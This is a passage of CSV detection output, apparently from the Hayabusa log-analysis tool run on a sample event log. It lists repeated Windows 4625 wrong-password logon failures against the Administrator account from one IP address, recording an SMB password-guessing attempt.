NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
